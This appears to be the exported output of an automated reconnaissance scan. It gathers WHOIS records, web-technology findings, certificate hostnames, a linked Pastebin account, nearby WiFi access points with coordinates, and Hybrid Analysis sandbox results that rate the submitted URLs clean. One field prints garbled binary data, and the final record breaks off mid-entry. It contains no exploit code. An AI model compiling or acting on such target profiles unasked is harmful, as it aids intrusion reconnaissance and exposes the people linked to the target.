>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:F0:3A:5B) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:45:21 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'VA', u'country_tld': u'.us', u'ip': u'2600:1f18:2489:8201::c8', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Ashburn', u'network': u'2600:1f18::/33', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 39.0469, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'AMAZON-AES', u'postal': u'20149', u'asn': u'AS14618', u'country': u'US', u'region': u'Virginia', u'longitude': -77.4903, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | fluid.battleb0t.xyz |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
%ERROR:101: no entries found
%
% No entries found in source RIPE.
% This query was served by the RIPE Database Query Service version 1.106.1 (ABERDEEN)
| expressdryclean.gr |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/ayhu | ayhu |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webdisk.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:44:09 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Cloudflare | ayhu.xyz |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HSTS | pics.battleb0t.xyz |
| 2023-05-12 02:54:38 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | CloudFlare CloudFlare Load Balancer | 172.67.168.252 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F2:1A:77) | 37.7642, -122.3993 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | BossWirelessSitecom (Net ID: 00:0C:F6:9F:57:4C) | 50.8897, 6.0563 |
| 2023-05-12 02:56:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.calgarystampede.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "52.85.247.122:443"\n "13.249.139.109:80"\n "65.8.55.54:80"\n "52.85.247.36:443"\n "65.8.55.18:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, 
{u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "35AY2PEO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\35AY2PEO.txt]- [targetUID: 00000000-00003564]\n Dropped file: "I24JX9IM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I24JX9IM.txt]- [targetUID: 00000000-00003564]\n Dropped file: "OC7G5YSO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OC7G5YSO.txt]- [targetUID: 00000000-00002492]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "search-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "calgary-stampede-workmark-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-youtube_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-facebook_1_.svg" has type "SVG Scalable Vector Graphics 
image"- [targetUID: N/A]\n "cs-logo-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-twitter_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "down-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mail-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpswww.calgarystampede.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003564]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002492]\n "_ssgManifest_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Agriculture_adventure_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 progressive precision 8 537x358 frames 3"- [targetUID: N/A]\n "index-c1b82293aeb4d48c_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Super_Wheel_113_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 240x240 segment length 16 progressive precision 8 420x280 frames 3"- [targetUID: N/A]\n "_0C20F077-3DD3-11ED-9C23-080027B2E225_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002492]\n "7ddd681543e5fa52_1_.css" has type "ASCII text with very long 
lines"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"GET /images/icon-twitter.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://www.calgarystampede.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "twitter")\n "GET /images/icon-youtube.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://www.calgarystampede.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive"\n "GET /_next/static/css/7ddd681543e5fa52.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.calgarystampede.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: 
Keep-Alive"\n "HTTP/1.1 200 OK\nAge: 12329\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Length: 379750\nContent-Type: text/html; charset=UTF-8\nDate: Mon, 26 Sep 2022 18:14:59 GMT\nEtag: "ef9f0aca69e5a7ab84d4408dbf4dc83f-ssl-df"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GDXVX21BQQBCED27H862YBAB\n\nJ\'O:u9kk1\\ Hb!F?J=q v |437w_z3bcO>=MM+SS|6Fn4Ko90SG#xxiO[{\'fboOc{?!wh6:~Yo~\n=k3-y<5@}~|4lFcC{<4k1$EsV|/Y5tQy%W$-e B! >>OMvv1YjI?1nx>iVvNjD&9\n_s3&w?7@|Up}V3d5V_%8Grm|>{XqO"]8fjRVH*dyM6z7gmRQtxcyZ#x "i_9M-y^\\u]sX0\'uF-ouh;sp$!~k`~blgK+y^|X[,/&hksHC`<O<ZYs"t3G4s\n$|^k\nq1EdUY\ngcXpns*>C\n<pr", "M8cwx.LuJ8cFVft<{bdc$";inF#q3 1U]+XV}P&|2!ZgsdkP~\'_w_R7DJe}822/9mAz\\XgT5>Zblh4^tQUycYX)F<]m.{nwid_GoEN:F\nam<!Mz8B[&l-D\'&2\n{7\\.gF?R+\nUov8XdL@Wt,A(\\*mI0Ds".Z%VPOZ}rI7>\\(n]X7^l-lsqKy{az?V?Rn<uTV#SG6d]eJ2d^q\'0Q+)4N@0od?.LX/9ZtWVvI5;};vw4>yz@il{wp\\l@**\nh5&"lZQn.@Y2*.*|s97gSimu5_T;~YM&[~lbyS{ypK^~Huw]4UEVEEWEX\n^?N;hJmX\'T\\-Wto&DSew!nB>@*"i<dg :@Pb\'XQLWg@DN|b\nnT,v,<c,ZkQqw.tbnyNqKiY+b8bxJu*H1cIdu@V!(1JH%H]#aMW@pUoUse\n.zJ\nbY+H<+r2Aqo6w}ia+.z(2R[J)*fI*Q*<rR)|%^&AW:VwjZ!\'xLKIj\nt([27l0<!;foqS/AqIU&6\',\nP)5@$\n19R\\JE%BIT".V>~."]Ve^Pf/G]VwqK^Mq<\ny4^~#W33nDmN@1xkSQ5+R$Y#V0xwkjT7ps+P<It6;;_H&8n9J<3k*O\n^m\nm%t@eUUVcXc\nL2|*(<y>{M7&Kk3tFk5UVxSP|)bgt_wjNR7&x\nj\n\nMT\nUDp["\\;+}\\f>;);+E0YWL6h1.8or7;^\nwA5G1@L;kXPY]Tc!|:+AT6F>L`&pfOP}fm:Pvo+{bE.>mJ<vMG)bVrcATql[N$DTE A4jDXU=U?!9{:{$7&::jVB^Vs;0u[H<)+KoQb1OY`EX IP8(\n^a$,|)_X^{\n\'pD^^N|\\/rM)o|{(]boPJ4hoxmain\nJ5T\'p\n!aFs@!5$dQ(aH%Zu}"#]~E.%-W2r8(Yxb>^uUL\\(ftS8E>E4*|g!_3#Cu1lA$GG(xiV>//_sDB^QS>J*Ev-p_\'R.q,ZhSXY|.\nz&\\%lkV$-+<\'\nTECqK(q%3~[PQGBN8=L&_,.,KvOqtTr!WTwR=FU^e@? 
<Q\nX@3ZSuI\\U78p|U}/5:)d:*3K{L~w`\'vLib@.TnmVZ.N*h2`\\*v,vZ<X",xRYy%3"8 f81N8&\n\'+A9oj|vv\'qh<{7;~ \ni)-c~S(mJxB2+_n_2Kb_akNqkw[>]:gi}@g4BKc!ZHAAKK^;A"(S^^do3s&H[_UWaW_$3b<ZpQd+\nD|O&NKV[6-[I]3*:)78bKy((kni5P$9,{;\'\n\n2 *rf7#YK(j^r{r3yyg.A!zM}0f5Zi1Z}["LiZ:ff>n:HS k^\nkxkjx}g#+;-gDW.jkt_+Qcx_`}?Ua3rF^1A=m?7*d_Q0#sN;}zk`?\\B5_m3lPKkNou}e|BojS"\'2ZOivfX~|kC+:x\'&|UV)epL$\n0t\na\nE9r\')J,rts54^$6Ho+]Otv-Bxp"(fgEbK.L3jqbRvd9r\n{Nca@)Bt\'"+F2A/p,]!K3`hY<K*&#vPSBOD?i/n3zijZcP"|k0k;7;9(TWg?W\n/ry[zcSMT;0^>j&uOt\'E~}R=(%|$\'Z\'dUH_XNJ%9.2\'("9VIK1"3!!V2\\\nJ*R<!L$Hf@@Y2q%%f2)L\\O<|]aeY[#[efE6kO9"u | 104.196.30.220 |
| 2023-05-12 02:59:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.96.1/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.1:80"\n "104.18.31.78:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3512"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0_Mutex"\n "IsoScope_db8_IESQMMUTEX_0_303"\n "IsoScope_db8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_db8_ConnHashTable<3512>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': 
u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003252]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003512]\n "0011OCN4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0011OCN4.txt]- [targetUID: 00000000-00003512]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003512]\n "~DFEC9FF18591CF0D57.TMP" has type "data"- Location: [%TEMP%\\~DFEC9FF18591CF0D57.TMP]- [targetUID: 00000000-00003512]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003512]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003512]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_71A2FDDC-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._6747C6ED-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFF697D7C0946BAA2.TMP" has type "data"- Location: [%TEMP%\\~DFFF697D7C0946BAA2.TMP]- [targetUID: 00000000-00003512]\n "W9XLKQJM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W9XLKQJM.txt]- [targetUID: 00000000-00003252]\n "~DF082348EE70E6B95F.TMP" has type "data"- Location: [%TEMP%\\~DF082348EE70E6B95F.TMP]- [targetUID: 00000000-00003512]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.1/"\n Pattern match: "http://188.114.96.1"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.1/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.18.31.78]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, 